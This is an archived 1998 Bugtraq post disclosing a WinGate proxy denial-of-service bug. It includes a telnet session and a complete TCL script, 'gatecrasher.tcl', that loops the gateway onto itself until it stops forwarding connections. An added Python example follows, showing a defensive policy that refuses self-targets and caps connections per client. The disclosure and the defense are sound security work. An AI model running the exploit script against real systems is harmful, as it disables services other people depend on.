Bugtraq mailing list archives
WinGate DoS
From: carother () OU EDU (Matt Carothers)
Date: Sat, 21 Feb 1998 04:38:56 -0600
After a WinGate attack on our IRC channel, a friend of mine was toying
around and discovered a fun bug:
$ telnet unsecured.wingate.com
Trying XXX.XX.XX.XXX...
Connected to XXX.XX.XX.XXX.
Escape character is '^]'.
WinGate>localhost
Connecting to host localhost...Connected
As you can see, the WinGate happily connects to itself. Do this enough
times, and ...
WinGate>localhost
Connecting to host localhost...Out of buffers
At this point, the WinGate stops forwarding connections. Clients can
still connect but cannot make use of it.
Below is a simple TCL exploit to demonstrate the idea.
- Matt
#!/usr/local/bin/tclsh
# gatecrasher.tcl
#
# This opens a WinGate and connects it to itself repeatedly until the
# target machine runs out of buffers and stops forwarding connections.
# The WinGate will not function as long as the script is running.
#
# Credit goes to Chris Snell <texan () hooked net> for finding the bug.
#
# I apologize in advance for not being cool enough to script this in perl.
#
# - Matt Carothers <carother () ou edu>
set host [lindex $argv 0];
set port [lindex $argv 1];
if {![string compare $host ""]} {
    set command [string range $argv0 [expr [string last / $argv0] + 1] end];
    puts stdout "Usage: $command <host> \[port\]";
    exit 1;
}
if {![string compare $port ""]} {
    set port 23;
}
if {[catch {set sock [socket $host $port]} stuff]} {
    # Could not connect for some reason. Output an error message and exit.
    puts stdout "$host:$port : $stuff";
    exit 1;
}
puts stdout "Connected to $host:$port. Launching WinGate kill ...";
set flag 0;
puts $sock "localhost";
flush $sock;
while {[gets $sock line] >= 0} {
    if {[string match "*Connected*" $line]} {
        # We've successfully connected the WinGate to itself.
        # Whee, let's do it again.
        puts $sock "localhost";
        flush $sock;
        puts -nonewline stdout ".";
        flush stdout;
        set flag 0;
    } elseif {[string match "*Out of buffers*" $line]} {
        # The WinGate is now out of buffers.
        # We'll output a message to that effect and keep trying. This
        # serves as a keep-alive and lets us jump in and fill any buffers
        # freed by clients which disconnect after the attack succeeds.
        if {!$flag} {
            puts stdout "\n*plink*";
            set flag 1;
        }
        puts $sock "localhost";
        flush $sock;
    }
}
puts stdout "\nConnection lost.";
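The post shows two missing controls in the gateway: it will forward a request whose target is itself (so "localhost" turns the proxy into a loop), and nothing bounds how many forwarded connections one client may hold, so a single session can consume every buffer. The following is an added example, not code from the post and not WinGate's own code (WinGate is closed source); it is written in Python as the connect-request policy a telnet-style proxy gateway should apply before opening an outbound socket. `GatewayPolicy`, `table_resolver`, the `CONSTRUCTED_DNS` table, the gateway address 192.0.2.10, the client addresses and the limits are all assumptions chosen for the demo. From the defender's side, the signal to alert on is the same pattern `run_demo` replays: one client repeatedly asking the gateway to connect to a loopback or self address.

```python
"""Connect-request policy for a proxy gateway (added example; not WinGate code).

Two checks bound the failure mode the post describes:
  1. never forward a request whose target is the gateway itself
     (loopback, unspecified, or one of its own listening addresses), and
  2. cap forwarded connections per client and overall, so one client
     cannot hold every buffer.
"""
import ipaddress
import socket
from collections import defaultdict


def dns_resolver(host):
    """Default resolver: every address getaddrinfo returns for host."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


class GatewayPolicy:
    def __init__(self, own_addresses, resolver=dns_resolver,
                 max_per_client=8, max_total=64):
        # Addresses this gateway listens on (hypothetical values in the demo).
        self.own = {ipaddress.ip_address(a) for a in own_addresses}
        self.resolver = resolver
        self.max_per_client = max_per_client
        self.max_total = max_total
        self.open_by_client = defaultdict(int)
        self.total_open = 0

    def _targets(self, host):
        """Literal IPs are used as-is; names go through the resolver."""
        try:
            return [ipaddress.ip_address(host)]
        except ValueError:
            return [ipaddress.ip_address(a) for a in self.resolver(host)]

    def check(self, client, host):
        """Decide whether client may have host forwarded. Opens nothing."""
        try:
            targets = self._targets(host)
        except (OSError, ValueError) as exc:
            return False, f"unresolvable target {host!r}: {exc}"
        if not targets:
            return False, f"no addresses for {host!r}"
        for addr in targets:
            # The check the post shows WinGate lacking: a request for
            # "localhost" asks the gateway to connect to itself.
            if addr.is_loopback or addr.is_unspecified or addr in self.own:
                return False, f"target {host!r} ({addr}) is the gateway itself"
        if self.open_by_client[client] >= self.max_per_client:
            return False, f"client {client} already holds {self.max_per_client} connections"
        if self.total_open >= self.max_total:
            return False, "gateway connection limit reached"
        return True, "ok"

    def open(self, client, host):
        """Apply the policy and, if allowed, account for the new connection."""
        allowed, reason = self.check(client, host)
        if allowed:
            self.open_by_client[client] += 1
            self.total_open += 1
        return allowed, reason

    def close(self, client):
        """Release one of client's connections (e.g. the remote side closed)."""
        if self.open_by_client[client] > 0:
            self.open_by_client[client] -= 1
            self.total_open -= 1


# Constructed name table so the demo runs offline; these are not real hosts.
CONSTRUCTED_DNS = {
    "localhost": ["127.0.0.1", "::1"],
    "proxy.example.com": ["192.0.2.10"],   # the gateway's own address (assumed)
    "irc.example.net": ["198.51.100.7"],
}


def table_resolver(host):
    try:
        return CONSTRUCTED_DNS[host]
    except KeyError:
        raise OSError(f"no such host: {host}") from None  # mirrors socket.gaierror


def run_demo():
    """Replay the post's request pattern against the policy; returns the decisions."""
    policy = GatewayPolicy(own_addresses=["192.0.2.10"],
                           resolver=table_resolver, max_per_client=3)
    attacker, other = "203.0.113.5", "203.0.113.9"   # constructed client addresses
    decisions = [
        policy.open(attacker, "localhost"),          # refused: loopback
        policy.open(attacker, "127.0.0.1"),          # refused: literal loopback
        policy.open(attacker, "proxy.example.com"),  # refused: gateway's own address
    ]
    for _ in range(4):                               # three allowed, fourth capped
        decisions.append(policy.open(attacker, "irc.example.net"))
    decisions.append(policy.open(other, "irc.example.net"))   # other clients unaffected
    policy.close(attacker)                                    # one slot frees up
    decisions.append(policy.open(attacker, "irc.example.net"))
    decisions.append(policy.open(attacker, "no-such-host.invalid"))  # refused: unresolvable
    return decisions


if __name__ == "__main__":
    for allowed, reason in run_demo():
        print("ALLOW" if allowed else "DENY ", reason)
```

The per-client cap is what keeps the "keep-alive" loop in the script from mattering: once the client is at its limit, freed buffers go to other clients rather than back to the one holding the gateway open.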